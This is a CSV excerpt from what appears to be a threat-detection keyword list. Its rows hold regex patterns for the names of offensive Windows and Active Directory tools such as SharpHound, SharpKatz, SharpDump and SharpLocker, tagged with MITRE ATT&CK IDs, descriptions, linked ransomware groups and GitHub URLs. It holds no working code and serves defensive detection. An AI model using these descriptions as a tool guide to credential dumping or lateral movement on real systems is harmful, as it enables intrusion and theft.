"*>SeShutdownPrivilegePoC<*",".{0,1000}\>SeShutdownPrivilegePoC\<.{0,1000}","offensive_tool_keyword","PrivFu","PoCs for sensitive token privileges such SeDebugPrivilege","T1068 - T1134 - T1134.001 - T1078 - T1059","TA0004 - TA0009 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","N/A","PrivilegedOperations","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","20525"
"*>SeSystemEnvironmentPrivilegePoC<*",".{0,1000}\>SeSystemEnvironmentPrivilegePoC\<.{0,1000}","offensive_tool_keyword","PrivFu","PoCs for sensitive token privileges such SeDebugPrivilege","T1068 - T1134 - T1134.001 - T1078 - T1059","TA0004 - TA0009 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","N/A","PrivilegedOperations","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","20526"
"*>SeTakeOwnershipPrivilegePoC<*",".{0,1000}\>SeTakeOwnershipPrivilegePoC\<.{0,1000}","offensive_tool_keyword","PrivFu","PoCs for sensitive token privileges such SeDebugPrivilege","T1068 - T1134 - T1134.001 - T1078 - T1059","TA0004 - TA0009 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","N/A","PrivilegedOperations","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","20529"
"*>SeTcbPrivilegePoC<*",".{0,1000}\>SeTcbPrivilegePoC\<.{0,1000}","offensive_tool_keyword","PrivFu","PoCs for sensitive token privileges such SeDebugPrivilege","T1068 - T1134 - T1134.001 - T1078 - T1059","TA0004 - TA0009 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","N/A","PrivilegedOperations","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","20530"
"*>SeTrustedCredManAccessPrivilegePoC<*",".{0,1000}\>SeTrustedCredManAccessPrivilegePoC\<.{0,1000}","offensive_tool_keyword","PrivFu","PoCs for sensitive token privileges such SeDebugPrivilege","T1068 - T1134 - T1134.001 - T1078 - T1059","TA0004 - TA0009 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","N/A","PrivilegedOperations","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","20531"
"*>ShareAudit.exe<*",".{0,1000}\>ShareAudit\.exe\<.{0,1000}","offensive_tool_keyword","ShareAudit","A tool for auditing network shares in an Active Directory environment","T1135 - T1005 - T1083 - T1210","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/dionach/ShareAudit","1","0","#originalfilename","N/A","8","1","42","15","2019-04-29T10:07:57Z","2019-02-26T16:00:15Z","20532"
"*>SharpAltSecIds<*",".{0,1000}\>SharpAltSecIds\<.{0,1000}","offensive_tool_keyword","SharpAltSecIds","Shadow Credentials via altSecurityIdentities - Enables attackers to add altSecurityIdentities entries to an account - linking it to an X.509 certificate for authentication. This allows them to impersonate the targeted account and authenticate using the associated certificate","T1098.003 - T1556.002 - T1078","TA0003 - TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/bugch3ck/SharpAltSecIds","1","0","#productname","N/A","9","1","12","3","2022-05-30T13:50:05Z","2022-05-30T13:40:17Z","20533"
"*>SharpAVKB<*",".{0,1000}\>SharpAVKB\<.{0,1000}","offensive_tool_keyword","SharpAVKB","Windows Antivirus Comparison and Patch Number Comparison","T1082 - T1518 - T1083","TA0007","N/A","N/A","Discovery","https://github.com/uknowsec/SharpAVKB","1","0","#productname","N/A","4","1","58","24","2019-10-28T06:50:30Z","2019-10-14T12:44:22Z","20534"
"*>SharpChrome<*",".{0,1000}\>SharpChrome\<.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#productname","SharpChrome","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","20535"
"*>SharpChrome<*",".{0,1000}\>SharpChrome\<.{0,1000}","offensive_tool_keyword","SharpChrome","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#productname","SharpChrome","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","20536"
"*>SharpClipboard<*",".{0,1000}\>SharpClipboard\<.{0,1000}","offensive_tool_keyword","SharpClipboard","monitor the content of the clipboard continuously","T1115","TA0006 - TA0009","N/A","N/A","Credential Access","http://github.com/slyd0g/SharpClipboard","1","0","#productname","N/A","8","1","N/A","N/A","N/A","N/A","20537"
"*>SharpCOM<*",".{0,1000}\>SharpCOM\<.{0,1000}","offensive_tool_keyword","SharpCOM","DCOM Lateral Movement","T1175","TA0008","N/A","N/A","Lateral Movement","https://github.com/rvrsh3ll/SharpCOM","1","0","N/A","N/A","10","2","128","30","2019-09-16T22:52:53Z","2018-12-13T15:10:55Z","20538"
"*>SharpDecryptPwd<*",".{0,1000}\>SharpDecryptPwd\<.{0,1000}","offensive_tool_keyword","SharpDecryptPwd","Decrypt Navicat,Xmanager,Filezilla,Foxmail,WinSCP,etc","T1003.008 - T1555.004 - T1552.002","TA0006","N/A","N/A","Credential Access","https://github.com/RowTeam/SharpDecryptPwd","1","0","N/A","N/A","10","8","769","117","2022-03-04T02:49:31Z","2022-02-25T11:21:43Z","20539"
"*>SharpDPAPI<*",".{0,1000}\>SharpDPAPI\<.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#productname","SharpDPAPI","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","20540"
"*>SharpDPAPI<*",".{0,1000}\>SharpDPAPI\<.{0,1000}","offensive_tool_keyword","SharpDPAPI","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#productname","SharpDPAPI","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","20541"
"*>SharpDump<*",".{0,1000}\>SharpDump\<.{0,1000}","offensive_tool_keyword","SharpDump","SharpDump is a C# port of PowerSploit's Out-Minidump.ps1 functionality.","T1003 - T1055 - T1070","TA0006 - TA0005 - TA0008","N/A","Avaddon","Credential Access","https://github.com/GhostPack/SharpDump","1","0","#companyname","N/A","10","7","664","130","2019-02-07T02:52:20Z","2018-07-24T17:42:19Z","20542"
"*>SharpEfsPotato<*",".{0,1000}\>SharpEfsPotato\<.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#productname","SharpEfsPotato","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","20543"
"*>SharpEfsPotato<*",".{0,1000}\>SharpEfsPotato\<.{0,1000}","offensive_tool_keyword","SharpEfsPotato","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#productname","SharpEfsPotato","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","20544"
"*>SharpEventLog<*",".{0,1000}\>SharpEventLog\<.{0,1000}","offensive_tool_keyword","SharpEventLog","reads all computer information related to successful (4624) or failed (4625) logins on the local machine to quickly identify operations and maintenance personnel during internal network penetration","T1078 - T1087.001","TA0007","N/A","N/A","Discovery","https://github.com/uknowsec/SharpEventLog","1","0","#content","N/A","4","3","205","34","2019-10-15T06:26:52Z","2019-10-15T06:14:32Z","20545"
"*>SharpGPO<*",".{0,1000}\>SharpGPO\<.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#productname","SharpGpo","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","20546"
"*>SharpGPO<*",".{0,1000}\>SharpGPO\<.{0,1000}","offensive_tool_keyword","SharpGpo","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#productname","SharpGpo","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","20547"
"*>SharpGPOAbuse<*",".{0,1000}\>SharpGPOAbuse\<.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#productname","SharpGPOAbuse","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","20548"
"*>SharpGPOAbuse<*",".{0,1000}\>SharpGPOAbuse\<.{0,1000}","offensive_tool_keyword","SharpGPOAbuse","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#productname","SharpGPOAbuse","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","20549"
"*>SharpGraphView<*",".{0,1000}\>SharpGraphView\<.{0,1000}","offensive_tool_keyword","SharpGraphView","Microsoft Graph API post-exploitation toolkit","T1078.004 - T1114.002","TA0001 - TA0003  - TA0006 - TA0008 - TA0007 - TA0010","N/A","N/A","Discovery","https://github.com/mlcsec/SharpGraphView","1","0","#productname","N/A","6","1","94","9","2024-07-13T12:27:38Z","2024-05-04T11:23:42Z","20550"
"*>SharpHound<*",".{0,1000}\>SharpHound\<.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#productname","SharpHound","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","20551"
"*>SharpHound<*",".{0,1000}\>SharpHound\<.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#productname","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","20552"
"*>SharpHound<*",".{0,1000}\>SharpHound\<.{0,1000}","offensive_tool_keyword","sharphound","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#productname","SharpHound","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","20553"
"*>SharpIncrease<*",".{0,1000}\>SharpIncrease\<.{0,1000}","offensive_tool_keyword","SharpIncrease","binary padding to add junk data and change the on-disk representation of a file","T1480 - T1027","TA0005","N/A","N/A","Defense Evasion","https://github.com/mertdas/SharpIncrease","1","0","N/A","N/A","6","2","148","30","2024-06-28T21:36:46Z","2023-03-14T23:35:32Z","20554"
"*>SharpKatz<*",".{0,1000}\>SharpKatz\<.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#productname","SharpKatz","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","20555"
"*>SharpKatz<*",".{0,1000}\>SharpKatz\<.{0,1000}","offensive_tool_keyword","SharpKatz","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#productname","SharpKatz","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","20556"
"*>SharpLAPS<*",".{0,1000}\>SharpLAPS\<.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#productname","SharpLAPS","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","20557"
"*>SharpLAPS<*",".{0,1000}\>SharpLAPS\<.{0,1000}","offensive_tool_keyword","SharpLAPS","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#productname","SharpLAPS","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","20558"
"*>SharpLocker<*",".{0,1000}\>SharpLocker\<.{0,1000}","offensive_tool_keyword","SharpLocker","get current user credentials by popping a fake Windows lock screen","T1056.002 - T1204.002 - T1071.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/Pickfordmatt/SharpLocker","1","0","#productname","N/A","10","7","616","145","2020-05-27T22:56:34Z","2019-05-31T11:16:38Z","20559"
"*>Sharpmad<*",".{0,1000}\>Sharpmad\<.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#productname","Sharpmad","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","20560"
"*>Sharpmad<*",".{0,1000}\>Sharpmad\<.{0,1000}","offensive_tool_keyword","Sharpmad","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#productname","Sharpmad","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","20561"
"*>SharpMapExec<*",".{0,1000}\>SharpMapExec\<.{0,1000}","offensive_tool_keyword","SharpMapExec","A sharpen version of CrackMapExec","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/cube0x0/SharpMapExec","1","0","#productname","N/A","10","7","664","124","2021-11-17T17:53:12Z","2020-12-01T13:03:50Z","20562"
"*>SharpMiniDump<*",".{0,1000}\>SharpMiniDump\<.{0,1000}","offensive_tool_keyword","SharpMiniDump","Create a minidump of the LSASS process from memory","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/b4rtik/SharpMiniDump","1","0","#productname","N/A","10","3","260","49","2022-11-02T15:47:30Z","2019-09-15T13:45:42Z","20563"
"*>SharpNBTScan<*",".{0,1000}\>SharpNBTScan\<.{0,1000}","offensive_tool_keyword","SharpNBTScan","a NetBIOS scanner. Ghost actors use this tool for hostname and IP address enumeration","T1018 - T1046","TA0007","Ghost Ransomware","N/A","Discovery","https://github.com/BronzeTicket/SharpNBTScan","1","0","#productname","N/A","7","1","71","4","2021-08-06T05:36:55Z","2021-07-12T08:57:39Z","20564"
"*>SharpRDP<*",".{0,1000}\>SharpRDP\<.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#productname","SharpRDP","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","20565"
"*>SharpRDP<*",".{0,1000}\>SharpRDP\<.{0,1000}","offensive_tool_keyword","SharpRDP","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#productname","SharpRDP","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","20566"
"*>SharpRoast<*",".{0,1000}\>SharpRoast\<.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#companyname","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","20567"
"*>SharpSAMDump<*",".{0,1000}\>SharpSAMDump\<.{0,1000}","offensive_tool_keyword","SharpSAMDump","SAM dumping via the registry in C#/.NET","T1003.002 - T1552.002","TA0006","N/A","N/A","Credential Access","https://github.com/jojonas/SharpSAMDump","1","0","#productname","N/A","10","1","48","8","2025-01-16T07:08:58Z","2024-05-27T10:53:27Z","20568"
"*>SharpSCCM<*",".{0,1000}\>SharpSCCM\<.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#productname","SharpSCCM","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","20569"
"*>SharpSCCM<*",".{0,1000}\>SharpSCCM\<.{0,1000}","offensive_tool_keyword","SharpSCCM","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#productname","SharpSCCM","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","20570"
"*>SharpShares<*",".{0,1000}\>SharpShares\<.{0,1000}","offensive_tool_keyword","SharpShares","Multithreaded C# .NET Assembly to enumerate accessible network shares in a domain","T1046 - T1135","TA0007 - TA0001","N/A","BlackSuit - Royal - BianLian - Fog","Discovery","https://github.com/mitchmoser/SharpShares","1","0","#productname","N/A","10","4","351","49","2021-09-21T08:14:27Z","2020-09-25T22:35:57Z","20571"
"*>SharpSploit<*",".{0,1000}\>SharpSploit\<.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/cobbr/SharpSploit","1","0","N/A","N/A","10","10","1789","312","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z","20572"
"*>SharpSQL<*",".{0,1000}\>SharpSQL\<.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#productname","SharpSQL","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","20573"
"*>SharpSQL<*",".{0,1000}\>SharpSQL\<.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#companyname","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","20574"
"*>SharpSQL<*",".{0,1000}\>SharpSQL\<.{0,1000}","offensive_tool_keyword","SharpSQL","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#productname","SharpSQL","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","20575"
"*>SharpThief<*",".{0,1000}\>SharpThief\<.{0,1000}","offensive_tool_keyword","SharpThief","A one-click program to steal the icon, resource information, version information, modification time, and digital signature (invalid) to make the program appear legitimate","T1036 - T1070 - T1078 - T1027 - T1202","TA0005 - TA0002 - TA0001","N/A","N/A","Defense Evasion","https://github.com/INotGreen/SharpThief","1","0","#description","N/A","8","4","372","37","2024-12-17T05:46:39Z","2024-03-05T05:34:50Z","20576"
"*>SharpUp<*",".{0,1000}\>SharpUp\<.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#productname","SharpUp","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","20577"
"*>SharpUp<*",".{0,1000}\>SharpUp\<.{0,1000}","offensive_tool_keyword","SharpUp","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#productname","SharpUp","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","20578"
"*>SharpView<*",".{0,1000}\>SharpView\<.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#productname","SharpView","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","20579"
